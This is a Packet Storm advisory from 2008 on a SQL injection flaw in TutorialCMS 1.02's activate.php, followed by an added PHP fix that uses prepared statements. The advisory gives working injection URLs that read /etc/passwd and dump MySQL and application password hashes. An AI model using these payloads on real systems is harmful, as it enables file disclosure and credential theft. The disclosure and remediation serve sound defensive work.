tutorialcms102-sql.txt

Date: 12 Jan 2008
Reported by: ka0x
Type: packetstorm
Source: packetstormsecurity.com

TutorialCMS 1.02 Remote SQL Injection Vulnerability, Spain 200

`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
TutorialCMS 1.02 Remote SQL Injection Vulnerability  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
bug found by ka0x  
contact: ka0x01[at]gmail.com  
D.O.M TEAM 2008  
we are: ka0x, an0de, xarnuz  
#from spain  
  
download http://www.wavelinkmedia.com/scripts/tutorialcms/  
  
requires magic_quotes_gpc = off  
  
vulnerability in activate.php  
  
vuln code:  
[...]  
  
$userName = $_GET["userName"];  
$code = $_GET["activate"];  
$sql = "SELECT activated FROM users WHERE username = '$userName' AND activated = '$code'";  
  
[...]  
  
/etc/passwd:  
http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8,9,9,9,9,9/*  
  
User and Password from mysql.user:  
http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,concat(user,0x203a3a20,password),6,7,8,9,9,9,9,9/**/from/**/mysql.user/*  
  
POC: http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,concat(0x757365723a20,username,0x20706173733a20,password),6,7,8,9,9,9,9,9/**/from/**/users/*  
  
Passwords are stored as MD5 hashes  
login: http://[host]/admin  
  
`
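
The query in `activate.php` interpolates `$_GET` values straight into the SQL string. The following added example (not TutorialCMS code and not part of the advisory) shows the same lookup with bound parameters and input validation. PDO with an in-memory SQLite database stands in for the application's MySQL connection; the helper name `activation_matches`, the sample row and the allowed input formats are assumptions.

```php
<?php
// Added example, not TutorialCMS code. An in-memory SQLite database stands in
// for the application's MySQL database; the table contents are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT, password TEXT, activated TEXT)');
$db->exec("INSERT INTO users VALUES ('alice', 'constructed-hash', 'a1b2c3d4')");

// Hypothetical helper replacing the concatenated query in activate.php.
function activation_matches(PDO $db, $userName, $code): bool
{
    // $_GET values can be arrays (?userName[]=x); accept only strings.
    if (!is_string($userName) || !is_string($code)) {
        return false;
    }
    // Allow-list the expected shape (assumed formats) before querying.
    if (!preg_match('/\A[A-Za-z0-9_.-]{1,64}\z/', $userName)
        || !preg_match('/\A[A-Za-z0-9]{1,64}\z/', $code)) {
        return false;
    }
    // Placeholders keep both values out of the SQL text, so quotes and
    // comment markers in the input cannot change the statement's structure.
    $stmt = $db->prepare(
        'SELECT activated FROM users WHERE username = ? AND activated = ?'
    );
    $stmt->execute([$userName, $code]);
    return $stmt->fetchColumn() !== false;
}

// Constructed inputs: a valid pair, a wrong code, a value containing a
// quote character, and an array where a string is expected.
$cases = [
    ['alice', 'a1b2c3d4'],
    ['alice', 'wrong'],
    ["alice'", 'a1b2c3d4'],
    [['alice'], 'a1b2c3d4'],
];
foreach ($cases as [$u, $c]) {
    $result = activation_matches($db, $u, $c) ? 'match' : 'no match';
    printf("%-12s %s\n", json_encode($u), $result);
}
```

`magic_quotes_gpc` was removed in PHP 5.4, so the advisory's precondition holds on every current PHP version and parameter binding, not input escaping by the runtime, is the control to rely on.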
